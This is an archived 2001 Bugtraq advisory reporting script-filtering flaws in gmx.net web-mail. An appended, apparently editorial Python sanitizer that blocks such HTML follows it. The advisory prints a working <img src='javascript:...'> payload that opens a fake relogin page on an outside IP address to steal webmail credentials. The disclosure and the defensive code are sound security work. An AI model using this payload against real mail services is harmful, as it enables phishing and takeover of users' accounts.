[20966] in bugtraq


gmx.net

daemon@ATHENA.MIT.EDU (rudi carell)
Mon Jun 11 14:46:57 2001

From: "rudi carell" <rudicarell@hotmail.com>
To: BUGTRAQ@securityfocus.com
Cc: security@gmx.net
Date: Mon, 11 Jun 2001 09:31:04 
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F47VXfEFzotSkrpEwwS000162e7@hotmail.com>


good morning bugtraq,

gmx.net is a european-based free web-mail-, web-community system comparable 
with hotmail.com.

like many other web-mail systems gmx.net has a problem filtering java-script 
in html-based mail-messages.

this enables an attacker to create html-messages with malicious java-script 
embedded.

problem description:

the html <img> tag can be used to embed malicious
java-scripts within html-mails

once the "html-mailpart" is opened by the gmx-user it is possible
that the "embedded" java-script is executed by the web-browser (if enabled :-). this 
makes it possible to place trojans and execute URL-based webmail-commands, 
leading to a compromise of the user's webmail-account.

sample with "classic" relogin-trojan:

---cut here---

<html><body> <img src="javascript: 
gmx=window.open('http://216.147.4.38/gmx/index.html','gmx',width='1000',height='800');window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resizeTo(1,1);w=screen.availWidth;h=screen.availHeight-40;gmx.moveTo(0,0);gmx.resizeTo(w,h);gmx.focus();">
<h4>mungo baby</h4></body></html>

---cut here---

.. not very sophisticated but working... changing user-options would be more 
elaborate ..


nice day,


rc

rudicarell@hotmail.com
security@freefly.com
http://www.freefly.com





vendor status: mail has been sent to security@gmx.net


RC-EOF
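the defensive counterpart to the problem described above, added here as an editorial example (it is not part of the original post and is not gmx.net's own filter): a small whitelist-based sanitizer for the html part of a mail. it drops script/style elements, all on* event handlers, and any href/src whose scheme is not on an allow-list. the scheme check first removes ASCII control characters and whitespace, because browsers of that era ignored them inside a scheme, which is exactly why a value such as "javascript: <newline>..." in an <img src> still executed. the sample message is constructed for this example and only loosely follows the shape of the post's sample; the returned "dropped" list is meant for logging at the mail gateway.

```python
"""Whitelist-based sanitizer for the html part of a web-mail message (constructed example)."""
import re
from html import escape
from html.parser import HTMLParser

# Tags the mail viewer is allowed to render; everything else is removed.
ALLOWED_TAGS = {"html", "body", "p", "br", "b", "i", "u", "h1", "h2", "h3", "h4", "a", "img"}
VOID_TAGS = {"br", "img"}
# Attributes allowed per tag; event handlers (on*) are never allowed.
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt", "width", "height"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto", "cid"}

_CTRL = re.compile(r"[\x00-\x20\x7f]")          # control chars and whitespace
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")  # RFC-style scheme prefix


def url_is_safe(value):
    """True if the URL has no scheme (relative) or an allow-listed scheme.

    Control characters and whitespace are stripped before the check only,
    so "javascript: \n..." and "java\tscript:..." are both recognised.
    """
    cleaned = _CTRL.sub("", value).lower()
    match = _SCHEME.match(cleaned)
    if match is None:
        return True  # relative URL: no scheme, cannot be javascript:
    return match.group(1) in SAFE_SCHEMES


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)  # entities in attributes are decoded
        self.out = []
        self.dropped = []        # (tag, attr, value) for gateway logging
        self._skip_depth = 0     # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
            self.dropped.append((tag, None, None))
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append((tag, None, None))
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append((tag, name, value))
                continue
            if name in URL_ATTRS and not url_is_safe(value):
                self.dropped.append((tag, name, value))
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if self._skip_depth == 0:          # script/style bodies are discarded
            self.out.append(escape(data, quote=False))


def sanitize(html_mail):
    """Return (clean_html, dropped) for one html mail part."""
    parser = MailSanitizer()
    parser.feed(html_mail)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample: a javascript: src with a newline after the colon,
# an entity-encoded variant, and an event-handler attribute.
SAMPLE_MAIL = (
    '<html><body> <img src="javascript: \n'
    'alert(1)">\n'
    '<h4>mungo baby</h4>'
    '<img src="&#106;avascript:alert(1)" onerror="alert(2)">'
    '<a href="http://example.com/">link</a></body></html>'
)

if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE_MAIL)
    print(clean)
    for record in dropped:
        print("dropped:", record)
```

the parser emits only the tags and attributes it recognises, so anything the filter does not understand (a new tag, an unusual attribute) is removed rather than passed through; that is the property a deny-list filter of the kind the post complains about does not have.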

